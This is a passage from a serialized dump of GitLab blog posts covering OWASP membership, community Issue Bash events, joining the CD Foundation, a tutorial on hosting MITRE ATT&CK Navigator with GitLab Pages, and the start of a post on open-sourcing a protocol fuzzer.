We also leverage OWASP on our [security team](/handbook/security/) who are responsible for the security posture of the company, products, and client-facing services.\n\n## Our favorite OWASP initiatives\n\nOur favorite OWASP initiatives include:\n* [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) - standard awareness document for developers for web application security\n* [WebGoat](https://owasp.org/www-project-webgoat/) - a deliberately insecure application that allows interested developers to test commonly found vulnerabilities\n* [ModSecurity WAF ruleset](https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project) - a set of generic attack detection rules for use with web application firewalls\n* [ZED Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - a penetration testing tool designed for testing web applications\n* [Benchmark](https://www.owasp.org/index.php/Benchmark) - a test suite designed to evaluate the accuracy, coverage, and speed of automated software vulnerability detection tools\n* [Find Security Bugs](https://www.owasp.org/index.php/OWASP_Find_Security_Bugs) - find security bugs\n* [Dependency Check](https://www.owasp.org/index.php/OWASP_Dependency_Check) - a tool that attempts to detect publicly disclosed vulnerabilities contained within a project’s dependencies\n* [Juice Shop](https://owasp.org/www-project-juice-shop/) - an intentionally insecure web application that can be used in security training and validation\n* [Software Assurance Maturity Model](https://www.owasp.org/index.php/OWASP_SAMM_Project) - an open framework to help organizations formulate and implement a strategy for software security\n\nOur membership allows us to support these OWASP projects while also allowing us to help shape the direction of the OWASP community.\n\n## OWASP AppSec California\n\nPlease meet us at [OWASP's AppSec California conference](https://2020.appseccalifornia.org/), which we 
are sponsoring.  It is Jan 21 thru Jan 24 in Santa Monica, CA.\n\n## We are hiring!\n\nIf all of this piques your interest, a reminder that GitLab is hiring for our engineering (secure, protect) and security teams!  Please review our [open jobs](/jobs/).\n\n",[277,930,9,865],{"slug":2432,"featured":6,"template":689},"gitlab-is-now-a-member-of-the-owasp-foundation","content:en-us:blog:gitlab-is-now-a-member-of-the-owasp-foundation.yml","Gitlab Is Now A Member Of The Owasp Foundation","en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation.yml","en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation",{"_path":2438,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2439,"content":2445,"config":2451,"_id":2453,"_type":14,"title":2454,"_source":16,"_file":2455,"_stem":2456,"_extension":19},"/en-us/blog/gitlab-issue-bash-december-2017",{"title":2440,"description":2441,"ogTitle":2440,"ogDescription":2441,"noIndex":6,"ogImage":2442,"ogUrl":2443,"ogSiteName":673,"ogType":674,"canonicalUrls":2443,"schema":2444},"Join GitLab's December Issue Bash","Join us December 2017 and help us to squash some of the open issues in the GitLab Community Edition tracker!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680123/Blog/Hero%20Images/gitlab-issue-bash-june-2017-cover.png","https://about.gitlab.com/blog/gitlab-issue-bash-december-2017","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's December Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2017-11-20\",\n      }",{"title":2440,"description":2441,"authors":2446,"heroImage":2442,"date":2448,"body":2449,"category":299,"tags":2450},[2447],"Mark Fletcher","2017-11-20","\n\nThis December we'll be holding another of our quarterly issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue 
tracker. We have over 1,800\n[GitLab contributors](http://contributors.gitlab.com/contributors/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **December 16th**\nand will keep it up until 23:59 UTC on Sunday, **December 17th**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! 
Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nWe have some awesome swag available as prizes:\n\n- Five T-shirts\n- Four pairs of pajama pants\n- Three Moleskine notebooks\n- Two [PocketCHIPs](https://getchip.com/pages/pocketchip)\n- One messenger bag (filled with all the stuff listed above!)\n\n![GitLab Issue Bash - Prizes](https://about.gitlab.com/images/blogimages/gitlab-issue-bash-june-2017-prizes.png)\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. 
Please mention them if you need any help or need attention on an issue.\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n* [@blackst0ne](https://gitlab.com/blackst0ne)\n",[277,267,9],{"slug":2452,"featured":6,"template":689},"gitlab-issue-bash-december-2017","content:en-us:blog:gitlab-issue-bash-december-2017.yml","Gitlab Issue Bash December 2017","en-us/blog/gitlab-issue-bash-december-2017.yml","en-us/blog/gitlab-issue-bash-december-2017",{"_path":2458,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2459,"content":2464,"config":2469,"_id":2471,"_type":14,"title":2472,"_source":16,"_file":2473,"_stem":2474,"_extension":19},"/en-us/blog/gitlab-issue-bash-june-2018",{"title":2460,"description":2461,"ogTitle":2460,"ogDescription":2461,"noIndex":6,"ogImage":2442,"ogUrl":2462,"ogSiteName":673,"ogType":674,"canonicalUrls":2462,"schema":2463},"Join GitLab's June Issue Bash","Join us this June and help us squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-june-2018","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's June Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2018-05-09\",\n      }",{"title":2460,"description":2461,"authors":2465,"heroImage":2442,"date":2466,"body":2467,"category":299,"tags":2468},[2447],"2018-05-09","\n\nThis June we'll be holding another of our quarterly issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. 
We have over 1,900\n[GitLab contributors](http://contributors.gitlab.com/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nCheck out [the Issue Bash landing page](/community/issue-bash/) for all the information about how it works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **June 2nd**\nand will keep it up until 23:59 UTC on Sunday, **June 3rd**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nAs prizes, we have some awesome swag available:\n\n- 14 T-shirts\n- 1 T-shirt and Hoodie for a lucky contributor\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. 
The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator).\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue.\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n",[277,803,267,9],{"slug":2470,"featured":6,"template":689},"gitlab-issue-bash-june-2018","content:en-us:blog:gitlab-issue-bash-june-2018.yml","Gitlab Issue Bash June 2018","en-us/blog/gitlab-issue-bash-june-2018.yml","en-us/blog/gitlab-issue-bash-june-2018",{"_path":2476,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2477,"content":2482,"config":2487,"_id":2489,"_type":14,"title":2490,"_source":16,"_file":2491,"_stem":2492,"_extension":19},"/en-us/blog/gitlab-issue-bash-march-2018",{"title":2478,"description":2479,"ogTitle":2478,"ogDescription":2479,"noIndex":6,"ogImage":2442,"ogUrl":2480,"ogSiteName":673,"ogType":674,"canonicalUrls":2480,"schema":2481},"Join GitLab's March 2018 Issue Bash","Help us to squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-march-2018","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's March 2018 Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2018-02-15\",\n      }",{"title":2478,"description":2479,"authors":2483,"heroImage":2442,"date":2484,"body":2485,"category":299,"tags":2486},[2447],"2018-02-15","\n\nThis March we'll be holding another of our quarterly 
issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1,900\n[GitLab contributors](http://contributors.gitlab.com/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **March 3rd**\nand will keep it up until 23:59 UTC on Sunday, **March 4th**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nAs prizes, we have some awesome swag available:\n\n- 14 T-shirts\n- 1 T-shirt and Hoodie for a lucky contributor\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. 
The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n",[267,277,9],{"slug":2488,"featured":6,"template":689},"gitlab-issue-bash-march-2018","content:en-us:blog:gitlab-issue-bash-march-2018.yml","Gitlab Issue Bash March 2018","en-us/blog/gitlab-issue-bash-march-2018.yml","en-us/blog/gitlab-issue-bash-march-2018",{"_path":2494,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2495,"content":2500,"config":2505,"_id":2507,"_type":14,"title":2508,"_source":16,"_file":2509,"_stem":2510,"_extension":19},"/en-us/blog/gitlab-issue-bash-september-2017",{"title":2496,"description":2497,"ogTitle":2496,"ogDescription":2497,"noIndex":6,"ogImage":2442,"ogUrl":2498,"ogSiteName":673,"ogType":674,"canonicalUrls":2498,"schema":2499},"Join GitLab's September Issue Bash","Join us September 2017 and help us to squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-september-2017","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's September Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2017-08-08\",\n      }",{"title":2496,"description":2497,"authors":2501,"heroImage":2442,"date":2502,"body":2503,"category":299,"tags":2504},[2447],"2017-08-08","\n\nThis September we'll 
be holding another of our quarterly issue bashes to allow the Community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1500\n[GitLab contributors](http://contributors.gitlab.com/contributors/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it Going to Happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **September 2nd**\nand will keep it up until 23:59 UTC on Sunday, **September 3rd**.\n\n## Who Can Contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! 
Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do You Get Involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nWe have some awesome swag ready for you:\n\n- Five T-shirts\n- Four pairs of pajama pants\n- Three Moleskine notebooks\n- Two [PocketCHIPs](https://getchip.com/pages/pocketchip)\n- One messenger bag (filled with all the stuff listed above!)\n\n![GitLab Issue Bash - Prizes](https://about.gitlab.com/images/blogimages/gitlab-issue-bash-june-2017-prizes.png)\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. 
Please mention them if you need any help or need attention on an issue\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@blackst0ne](https://gitlab.com/blackst0ne)\n",[277,267,9],{"slug":2506,"featured":6,"template":689},"gitlab-issue-bash-september-2017","content:en-us:blog:gitlab-issue-bash-september-2017.yml","Gitlab Issue Bash September 2017","en-us/blog/gitlab-issue-bash-september-2017.yml","en-us/blog/gitlab-issue-bash-september-2017",{"_path":2512,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2513,"content":2519,"config":2525,"_id":2527,"_type":14,"title":2528,"_source":16,"_file":2529,"_stem":2530,"_extension":19},"/en-us/blog/gitlab-joins-cd-foundation",{"title":2514,"description":2515,"ogTitle":2514,"ogDescription":2515,"noIndex":6,"ogImage":2516,"ogUrl":2517,"ogSiteName":673,"ogType":674,"canonicalUrls":2517,"schema":2518},"GitLab leads the industry forward with the CD Foundation","Today we're proud to announce we've joined the CD Foundation as a founding member.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663648/Blog/Hero%20Images/gitlab-joins-cd-foundation.jpg","https://about.gitlab.com/blog/gitlab-joins-cd-foundation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab leads the industry forward with the CD Foundation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2019-03-12\",\n      }",{"title":2514,"description":2515,"authors":2520,"heroImage":2516,"date":2521,"body":2522,"category":299,"tags":2523},[1235],"2019-03-12","\n\nToday GitLab joined the [CD Foundation](https://cd.foundation/announcement/2019/03/12/the-linux-foundation-announces-new-foundation-to-support-continuous-delivery-collaboration/) as a founding member, to help foster collaboration and educate the industry on how to enable any software development team around the world to implement CI/CD 
best practices.\n\nAs one of the first to introduce cloud native CI/CD to the industry, we are excited to see so many companies come together to discuss ways to take the industry forward to ensure that code is able to get to production not only quickly, but securely. We are looking forward to lending our experience working with millions of developers and thousands of enterprises to drive forward the conversation on best practices and standards to streamline the code delivery promise.\n\n## But there is more to software delivery than CI/CD\n\nWhile it is great there is an eye on the best CI/CD practices, we believe there is more to delivering great software to market than just CI/CD, which is why at GitLab we are focused on providing a single application for the entire DevOps lifecycle.\n\nIt is not only about source code management or CI/CD but also about:\n- [Value stream management](/solutions/value-stream-management/): Understanding your teams' work and their workflow so they can deliver value to customers faster.\n- Operational excellence: Implementing dynamic infrastructure and robust observability to increase uptime and decrease mean time to resolution.\n- Security flow: Building security into every step of your code delivery process, to deliver secure software without slowing the pace of innovation.\n- Monitoring: Automatically monitor metrics so you know how any change in code impacts your production environment.\n\nOur entire [2019 product vision and beyond](/blog/gitlab-product-vision/) is about continuing to build out new capabilities across the entire DevOps lifecycle, to make it easier for enterprises to streamline their processes into one application, helping teams innovate at faster speeds.\n\nAs an open source company, we value the community’s contributions, in helping make GitLab what it is today. 
We look forward to continuing to drive the industry forward in CI/CD, as well as working with you to help deliver your products to market quickly and securely.\n\nPhoto by [YIFEI CHEN](https://unsplash.com/photos/FPMRxKd7MxI?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/spiral-lights?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[845,2524,9],"CD",{"slug":2526,"featured":6,"template":689},"gitlab-joins-cd-foundation","content:en-us:blog:gitlab-joins-cd-foundation.yml","Gitlab Joins Cd Foundation","en-us/blog/gitlab-joins-cd-foundation.yml","en-us/blog/gitlab-joins-cd-foundation",{"_path":2532,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2533,"content":2539,"config":2545,"_id":2547,"_type":14,"title":2548,"_source":16,"_file":2549,"_stem":2550,"_extension":19},"/en-us/blog/gitlab-mitre-attack-navigator",{"title":2534,"description":2535,"ogTitle":2534,"ogDescription":2535,"noIndex":6,"ogImage":2536,"ogUrl":2537,"ogSiteName":673,"ogType":674,"canonicalUrls":2537,"schema":2538},"Use GitLab and MITRE ATT&CK Navigator to visualize adversary techniques","This tutorial helps build and deploy a customized version of MITRE's ATT&CK Navigator using GitLab CI/CD and GitLab Pages.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","https://about.gitlab.com/blog/gitlab-mitre-attack-navigator","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Use GitLab and MITRE ATT&CK Navigator to visualize adversary techniques\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2023-08-09\",\n      }",{"title":2534,"description":2535,"authors":2540,"heroImage":2536,"date":2542,"body":2543,"category":865,"tags":2544},[2541],"Chris Moberly","2023-08-09","\nIf you use [MITRE 
ATT&CK](https://attack.mitre.org/) for classifying cybersecurity incidents, you may want to visualize your coverage across a matrix. This blog will show you how to do this automatically with GitLab by deploying the [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator) web application pre-populated with your own annotated matrices.\n\nWe make this easy by providing a fully working [example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator) for you to fork and customize. When you're finished, you'll have an interactive visualization tool that displays your coverage of techniques across the ATT&CK framework.\n\n![Image showing ATT&CK Navigator deployed from example project](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/navigator-portal.png)\nATT&CK Navigator deployed from our example project\n{: .note.text-center}\n\n## About MITRE ATT&CK framework\nMITRE ATT&CK is a framework to classify and describe cybersecurity attacks based on real-world observations. It provides a common language that can be used by different groups inside a security organization to collaborate on security initiatives.\n\nFor example, when a company's Red Team emulates an attack based on the techniques of a relevant adversary, they deliver a report that includes a list of the specific technique IDs involved in the exercise. The team in charge of detecting and responding to these attacks can use those IDs to research and implement improved defensive capabilities.\n\nBoth of these groups may want to track their coverage of offensive and defensive capabilities across one of [MITRE's ATT&CK matrices](https://attack.mitre.org/matrices/enterprise/). These matrices are charts that visualize attack tactics and techniques relevant to specific industries and technologies. 
For example, a company like GitLab may be interested in understanding which techniques in the [Cloud matrix](https://attack.mitre.org/matrices/enterprise/cloud/) we have emulated to test our detection and response capabilities.\n\nMITRE provides a free interactive web application, ATT&CK Navigator, to visualize, annotate, and explore these matrices.\n\nAt GitLab, [our Red Team](https://about.gitlab.com/handbook/security/threat-management/red-team/) produces a new Navigator matrix at the completion of each operation. The matrix highlights which attack techniques we've conducted. We find it useful to view all of these matrices in a single location, with the addition of a combined matrix showing all of the techniques we have conducted across all historical operations. This helps us understand trends and identify potential gaps to cover in future operations.\n\n## Fork our example project to get started\nYou can fork our example project to get going on your own. First, you will need an account on [GitLab.com](https://gitlab.com), or on a self-hosted instance [with GitLab Pages enabled](https://docs.gitlab.com/ee/administration/pages/).\n\nNext, browse to [our example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator) and click on the \"Forks\" button to create a new fork. Fill in the form shown below by choosing a name, location, and description for your copy of the project. You may wish to change \"Visibility level\" to \"Private,\" which will require authentication to view your deployed application.\n\n![Example project showing where to click on the Forks button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/fork-project.png)\n\nAfter that, take a look inside the `layers/` folder of your new project. Each file in this folder will be used to pre-populate a new tab in the deployed web application where the listed attack techniques are annotated in green. 
We provide two example files, as well as an empty template file inside `templates/template.yml`.\n\nTemplates should list specific MITRE ATT&CK \"technique\" IDs as bullets below their corresponding MITRE ATT&CK tactic. You only need to include the tactics for which you will add techniques. Here is a short example of techniques across four tactics:\n\n```yaml\nname: Operation 1\ndescription: Example of a Red Team operation - not real data\ntechniques:\n  initial-access:\n    - T1190\n  privilege-escalation:\n    - T1611\n    - T1055\n  lateral-movement:\n    - T1210\n    - T1021\n  exfiltration:\n    - T1041\n```\n\nYou can edit the example files or delete them and add new files of your own.\n\nThe next step is to build and deploy the web application. If you made any changes to the `layers/` folder inside your default branch, this build process should have started automatically. If you just want to deploy the application using the provided sample data, browse to \"Build\" -\\> \"Pipelines\" using the project's sidebar and click the \"Run pipeline\" button.\n\n![Image showing how to build and deploy app with run pipeline button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/run-pipeline.png)\n\n\nYou can check to see if a pipeline has completed successfully by browsing to \"Build\" -\\> \"Jobs\" in the sidebar. There should be at least two jobs with a status of \"passed\" - one named `build_navigator` and one named `pages`.\n\nOnce both jobs are complete, browse to \"Deploy\" -\\> \"Pages\" in the project's sidebar. Check the \"Use unique domain\" box and click the \"Save changes\" button.\n\n![Image showing complete jobs with save changes button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/pages-settings.png)\n\n\nThat's it! 
Your application should now be accessible using the URL provided under \"Access pages\" on the same page.\n\n## How the example project works\nThere are three main components inside the example project:\n- The `gitlab-ci.yml` file. This defines what jobs run, and when they run. The file contains rules to automatically run the jobs whenever you push changes to the `layers/` folder inside the project's default branch, or whenever you manually run a pipeline as described above.\n- The `create-layers.py` file. This Python script takes the custom YAML files you provide, and then generates individual and combined JSON files in the format that ATT&CK Navigator expects. You can customize this file to change the annotation color (`HIGHLIGHT_COLOR`) as well as some of the application defaults (`JSON_BLOB`). In our internal version, for example, we remove some of the platform filters that don't apply to us.\n- The `build-navigator.sh` file. The shell script is responsible for downloading the ATT&CK Navigator application, injecting the custom layers we create, and building the application. The output is a static website that we then host using GitLab Pages.\n\n## More features of the ATT&CK Navigator app\nOnce deployed, the application is interactive. This blog focuses on using a colored annotation to visualize coverage, but the [application is capable of much more](https://github.com/mitre-attack/attack-navigator/blob/master/USAGE.md).\n\nHere are some features we use often:\n- In the \"layer controls\" bar up top, click on the button that looks like an asterisk surrounded by up and down arrows. The name is \"expand annotated sub-techniques.\" This will ensure that all techniques in your YAML file are easily viewable, as subtechniques may be hidden away when the matrix first loads.\n- If you want to hide all unannotated techniques, click anywhere in the matrix and select \"select unannotated.\" Then, under \"technique controls,\" click on the \"toggle state\" button. 
This will give you a much cleaner matrix, showing only the specific techniques you've provided in your custom YAML files.\n\n![ATT&CK Navigator with unannotated techniques hidden](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/navigator-collapsed.png)\nATT&CK Navigator with unannotated techniques hidden\n{: .note.text-center}\n\nATT&CK is not a bingo card, and for most organizations the goal shouldn't be to have green squares across the board. Instead, you should use this to understand your own coverage and how it relates to the threats most relevant to you.\n\n## Share your feedback\nMITRE ATT&CK Navigator is a great tool for visualizing coverage of attack techniques across a matrix. Using our example project, you can easily deploy an automated solution that builds this tool and pre-populates it with your own data.\n\nOn our Red Team, we love to find creative use cases for GitLab, and this is one we use ourselves. If you find this useful, or if you have any ideas to improve it, we would love to hear from you! 
Feel free to open an issue or a merge request inside our [example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator).\n",[865,9,752,109],{"slug":2546,"featured":6,"template":689},"gitlab-mitre-attack-navigator","content:en-us:blog:gitlab-mitre-attack-navigator.yml","Gitlab Mitre Attack Navigator","en-us/blog/gitlab-mitre-attack-navigator.yml","en-us/blog/gitlab-mitre-attack-navigator",{"_path":2552,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2553,"content":2559,"config":2564,"_id":2566,"_type":14,"title":2567,"_source":16,"_file":2568,"_stem":2569,"_extension":19},"/en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine",{"title":2554,"description":2555,"ogTitle":2554,"ogDescription":2555,"noIndex":6,"ogImage":2556,"ogUrl":2557,"ogSiteName":673,"ogType":674,"canonicalUrls":2557,"schema":2558},"We're open sourcing Protocol Fuzzer Community Edition!","GitLab is releasing an open source protocol fuzz testing repository.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667243/Blog/Hero%20Images/open-source-community.png","https://about.gitlab.com/blog/gitlab-open-sources-protocol-fuzz-test-engine","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're open sourcing Protocol Fuzzer Community Edition!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sam Kerr\"}],\n        \"datePublished\": \"2021-03-23\",\n      }",{"title":2554,"description":2555,"authors":2560,"heroImage":2556,"date":2561,"body":2562,"category":930,"tags":2563},[2013],"2021-03-23","\n\n[GitLab acquired Peach Tech](/press/releases/2020-06-11-gitlab-acquires-peach-tech-and-fuzzit-to-expand-devsecops-offering.html), the industry leader in protocol and API fuzz testing, last year.\n\nWe were thrilled to release [API fuzz testing](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/) as part of our [13.4 
